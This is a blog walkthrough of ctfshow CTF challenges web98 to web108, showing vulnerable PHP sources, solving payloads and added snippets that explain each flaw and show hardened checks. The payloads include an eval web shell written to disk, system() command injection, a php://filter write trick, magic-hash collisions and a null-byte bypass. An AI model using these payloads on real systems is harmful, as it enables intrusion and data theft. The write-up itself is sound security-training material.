ctfshow web beginner series, PHP features: web98-108


web98

Notice: Undefined index: flag in /var/www/html/index.php on line 15

Notice: Undefined index: flag in /var/www/html/index.php on line 16

Notice: Undefined index: HTTP_FLAG in /var/www/html/index.php on line 17
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 21:39:27
# @link: https://ctfer.com

*/

include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

?>

The first statement means: if any GET parameter was passed at all, make $_GET a reference to $_POST.

if ($_GET) => $_GET = &$_POST;

The second statement: if $_GET['flag'] == 'flag', then make $_GET a reference to $_COOKIE.

The third statement works the same way, with $_SERVER.

The first condition always has to be met; once it is, we can make the second and third conditions fail and pass the value straight through POST. Payload: GET ?a=a, POST HTTP_FLAG=flag

Second solution: satisfy the first and second conditions and fail the third. Payload: GET ?a=a, POST flag=flag, Cookie HTTP_FLAG=flag

web99

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 22:36:12
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?>

i runs from 36 to 0x36d, and each iteration pushes a random number between 1 and i into $allow. So $allow has 841 elements, with values ranging from 0 to 877.

Then n is read from GET and checked against $allow; if it is present, the POST parameter content is written to the file named n. Because in_array is called without its third argument, the comparison is loose, so 1.php is treated as equal to 1. Payload: GET ?n=1.php, POST content=<?php eval($_POST[1]); ?>

Then visit 1.php and pass the parameter.
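An added example (not part of the write-up) showing why the loose in_array() check in web99 accepts "1.php", and a version of the check that does not. The small allow-list used for the demo is constructed here; buildAllow() rebuilds the challenge's own list.

```php
<?php
// Added example, not from the write-up: why in_array() without its third argument
// accepts the filename "1.php" in web99, and a check that does not.

// Same $allow construction as the challenge: one rand(1, $i) per loop step,
// so every element is an integer.
function buildAllow(): array {
    $allow = [];
    for ($i = 36; $i < 0x36d; $i++) {
        $allow[] = rand(1, $i);
    }
    return $allow;
}

// The challenge's check: loose comparison, so the string $n is juggled against
// each integer. On PHP 7 "1.php" == 1 is true (leading-numeric string);
// on PHP 8 the int is converted to "1" and compared as a string, so it is false.
function looseCheck(string $n, array $allow): bool {
    return in_array($n, $allow);
}

// Hardened check: only a pure decimal string may match, and it is compared as an
// int with strict types, so "1.php", "1e0" or " 1" can never match the integer 1.
function strictCheck(string $n, array $allow): bool {
    return ctype_digit($n) && in_array((int) $n, $allow, true);
}

$allow = [1, 2, 3];   // small constructed allow-list for the demo;
                      // swap in buildAllow() for the challenge's own list
foreach (['1', '1.php', '../1.php'] as $n) {
    printf("%-10s loose=%s strict=%s\n", $n,
        var_export(looseCheck($n, $allow), true),
        var_export(strictCheck($n, $allow), true));
}
```

Even with the strict check the file name is still user-chosen; restricting it to digits is what keeps the wrapper and extension tricks out.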

web100

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-21 22:10:28
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}


?>

Notice: Undefined index: v1 in /var/www/html/index.php on line 17

Notice: Undefined index: v2 in /var/www/html/index.php on line 18

Notice: Undefined index: v3 in /var/www/html/index.php on line 19

Because assignment has higher precedence than the `and` operator in PHP, only v1 needs to be numeric.

Payload: GET ?v1=1&v2=eval($_POST[1])?>&v3=; POST 1=system('tac flag36d.php');

But this turned out not to be the real flag, so we looked at ctfshow.php and found flag_is_8076fcaf0x2d27790x2d49030x2d95e60x2d5f142389996f; URL-decoding the 0x parts gives the flag. Remember to wrap it in ctfshow{}.
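An added example (not from the write-up) of how PHP parses the `$v0 = ... and ...` line in web100 and web101 (web102 and web103 use the same pattern with two operands), beside the form that checks every operand. The sample inputs are constructed.

```php
<?php
// Added example, not from the write-up: how PHP parses the `$v0 = ... and ...`
// line used in web100/web101 (and the two-operand form in web102/web103),
// next to the form that actually checks every operand.

// As written in the challenge. `=` binds tighter than `and`, so this is
// ($v0 = is_numeric($v1)) and is_numeric($v2) and is_numeric($v3);
// the last two calls still run, but their result is never stored.
function challengeCheck($v1, $v2, $v3): bool {
    $v0 = is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
    return $v0;
}

// `&&` has higher precedence than `=`, so $v0 receives the whole conjunction.
function fixedCheck($v1, $v2, $v3): bool {
    $v0 = is_numeric($v1) && is_numeric($v2) && is_numeric($v3);
    return $v0;
}

// Constructed inputs shaped like the web100 request: only v1 is numeric.
$cases = [
    ['1', 'not-a-number', ';'],
    ['1', '2', '3'],
];
foreach ($cases as [$v1, $v2, $v3]) {
    printf("v2=%-16s challenge=%s fixed=%s\n", var_export($v2, true),
        var_export(challengeCheck($v1, $v2, $v3), true),
        var_export(fixedCheck($v1, $v2, $v3), true));
}
```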

web101

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-22 00:26:48
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
        if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}

?>

Notice: Undefined index: v1 in /var/www/html/index.php on line 17

Notice: Undefined index: v2 in /var/www/html/index.php on line 18

Notice: Undefined index: v3 in /var/www/html/index.php on line 19

Many special characters are banned, so we can use the reflection class to look at it.

Payload: ?v1=1&v2=echo new Reflectionclass&v3=; We can see that the last character of the flag is a space, so we just brute-force the last character.

web102

<?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-23 20:59:43

*/


highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}


?>

Notice: Undefined index: v1 in /var/www/html/index.php on line 14

Notice: Undefined index: v2 in /var/www/html/index.php on line 15

Notice: Undefined index: v3 in /var/www/html/index.php on line 16
hacker

This challenge is a clever bit of assembly; here is the payload directly. GET: v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=2.php POST: v1=hex2bin

web103

<?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-23 21:03:24

*/


highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    if(!preg_match("/.*p.*h.*p.*/i",$str)){
        file_put_contents($v3,$str);
    }
    else{
        die('Sorry');
    }
}
else{
    die('hacker');
}

?>

Notice: Undefined index: v1 in /var/www/html/index.php on line 14

Notice: Undefined index: v2 in /var/www/html/index.php on line 15

Notice: Undefined index: v3 in /var/www/html/index.php on line 16
hacker

Same as web102.

web104

<?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:27:20

*/


highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}



?>

Since there is no check that the two values differ, simply submit the same value for v1 and v2.

Second option: bypass with arrays.

Third option: use inputs whose sha1 starts with 0e.

web105

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:34:07

*/

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

?>
你还想要flag嘛?

Tested: PHP variable overwriting. Step one: assign the value of flag to suces. Step two: assign the value of suces to error. Finally the value of error is printed.

Payload: GET ?suces=flag POST error=suces
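An added example (not from the write-up) that reproduces the web105 $$key = $$value chain inside a function's local scope, next to a hardened form. The flag string and messages are constructed stand-ins for flag.php.

```php
<?php
// Added example, not from the write-up: the $$key = $$value overwrite chain from
// web105 reproduced in a function's local scope, and the hardened form.
// The flag value and messages are constructed stand-ins for flag.php.

function challenge(array $get, array $post): string {
    $flag  = 'ctfshow{constructed-example}';
    $error = 'you still want the flag?';
    $suces = 'fine, here you go!';
    foreach ($get as $key => $value) {
        if ($key === 'error') { return 'what are you doing?!'; }
        $$key = $$value;     // a request key picks the variable to overwrite...
    }
    foreach ($post as $key => $value) {
        if ($value === 'flag') { return 'what are you doing?!'; }
        $$key = $$value;     // ...and a request value picks the source, $flag included
    }
    if (!(($post['flag'] ?? null) == $flag)) { return $error; }
    return "your are good" . $flag . "\n" . $suces;
}

// Hardened: request data stays in its own array and is never used as a variable
// name, so neither $error nor $suces can be re-pointed at $flag.
function hardened(array $get, array $post): string {
    $flag  = 'ctfshow{constructed-example}';
    $error = 'you still want the flag?';
    $suces = 'fine, here you go!';
    if (!hash_equals($flag, (string) ($post['flag'] ?? ''))) { return $error; }
    return "your are good" . $flag . "\n" . $suces;
}

// Direct attempts are stopped by the two checks...
echo challenge(['error' => 'flag'], []), "\n";
echo challenge([], ['error' => 'flag']), "\n";
// ...but the two-step chain from the write-up (GET suces=flag, POST error=suces)
// routes $flag into $suces, then $suces into $error, which die($error) prints.
echo challenge(['suces' => 'flag'], ['error' => 'suces']), "\n";
echo hardened(['suces' => 'flag'], ['error' => 'suces']), "\n";
```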

web106

<?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:38:27

*/

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
        echo $flag;
    }
}

?>

Use arrays, or construct inputs whose sha1 starts with 0e.

Common inputs whose hash starts with 0e (input, then digest):

QNKCDZO 0e830400451993494058024219903391
240610708 0e462097431906509019562988736854
aabg7XSs 0e087386482136013740957780965295
aabC9RqS 0e041022518165728065344349536299
s878926199a 0e545993274517709034328855841020
s155964671a 0e342768416822451524974117254469
s214587387a 0e848240448830537924465865611904
s1091221200a 0e940624217856561557816327384675
s1885207154a 0e509367213418206700842008763514

Payload: GET ?v1[]=1 POST v2[]=2

web107

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:24:14

*/

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
    parse_str($v1,$v2);
    if($v2['flag']==md5($v3)){
        echo $flag;
    }
}

?>

Official solution: GET ?v3=240610708 POST v1=flag=0

Alternatively, make md5($v3) null and $v2['flag'] null as well. Payload: GET ?v3[]=1 POST v1= (empty)
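An added example (not from the write-up) that runs the loose == comparisons from web104, web106 and web107 beside a strict version. The inputs QNKCDZO and 240610708 are the ones listed on this page (their digests above are md5 values); the array inputs are constructed.

```php
<?php
// Added example, not from the write-up: the == comparisons from web104, web106
// and web107 next to a strict version. QNKCDZO and 240610708 are the inputs listed
// on this page (their digests are md5 values); array inputs are constructed here.

// Hash like the challenges do, tolerating non-string input: PHP 7 returns null
// with a warning, PHP 8 throws TypeError. Either way the "digest" becomes null.
function hashOrNull(string $algo, $v): ?string {
    try {
        return @$algo($v);
    } catch (\TypeError $e) {
        return null;
    }
}

// web104/web106: sha1($v1) == sha1($v2); web107: $v2['flag'] == md5($v3).
function looseEqual(string $algo, $a, $b): bool {
    return hashOrNull($algo, $a) == hashOrNull($algo, $b);
}

// Hardened: only strings are hashed, and digests are compared byte for byte in
// constant time, so "0e..." digests are no longer equal to 0 or to each other.
function strictEqual(string $algo, $a, $b): bool {
    if (!is_string($a) || !is_string($b)) {
        return false;
    }
    return hash_equals($algo($a), $algo($b));
}

$checks = [
    // web107 official solution: parse_str('flag=0') yields "0", and md5('240610708')
    // is a "0e..." string; both are numeric strings, so == compares them as 0 == 0.
    'web107 "0" == md5(240610708)' => '0' == md5('240610708'),
    // web106: two different inputs whose digests both parse as the number 0.
    'web106 magic hashes, loose'   => looseEqual('md5', 'QNKCDZO', '240610708'),
    'web106 magic hashes, strict'  => strictEqual('md5', 'QNKCDZO', '240610708'),
    // web104/web106 arrays: sha1() of an array is null on both sides, while
    // the extra $v1 != $v2 test in web106 still passes for [1] and [2].
    'web104 arrays, loose'         => looseEqual('sha1', [1], [2]),
    'web104 arrays, strict'        => strictEqual('sha1', [1], [2]),
];
// web107 second solution: an empty v1 leaves no 'flag' key, so $v2['flag'] is
// null, and md5() of an array is null as well.
parse_str('', $q);
$checks['web107 null == null'] = @$q['flag'] == hashOrNull('md5', [1]);

foreach ($checks as $label => $result) {
    printf("%-30s %s\n", $label, var_export($result, true));
}
```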

web108

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:53:55

*/

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');
}
// only 36d people get to see the flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}

?>
error

ereg has a flaw: it stops reading at the truncation character, i.e. a null byte (%00), so we exploit that. Payload: ?c=a%00778
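An added example (not from the write-up) of the web108 check rebuilt with preg_match(), which is binary-safe, so a null byte in the input no longer ends the string early; ereg() itself was removed in PHP 7, so only the replacement is shown. The inputs are constructed.

```php
<?php
// Added example, not from the write-up: the web108 check re-done with preg_match(),
// which is binary-safe, so a NUL byte in the input no longer ends the string early.
// ereg() itself is gone since PHP 7, so only the replacement is shown here.

function lettersOnly(string $c): bool {
    // Same pattern as the challenge. /D stops $ from matching before a trailing
    // newline, so the whole input, NUL bytes included, must be letters.
    return preg_match('/^[a-zA-Z]+$/D', $c) === 1;
}

function reaches36d(string $c): bool {
    // The second test from the challenge, unchanged: intval() stops at the first
    // non-digit, so only the leading digits of the reversed string count.
    return intval(strrev($c)) == 0x36d;
}

// Constructed inputs: the page's payload (a, NUL, 778) and a plain letter string.
// "a\0" . "778" keeps the NUL separate from the digits; "\0778" would be an
// octal escape.
foreach (["a\0" . "778", "abc"] as $c) {
    printf("%-12s letters=%s 36d=%s\n", addcslashes($c, "\0"),
        var_export(lettersOnly($c), true), var_export(reaches36d($c), true));
}
```

The point for a reviewer is that both tests must see the same bytes; a validator that stops at NUL while the consumer reads past it is the whole bug.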


Author: Rolemee
License: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit Rolemee when reposting!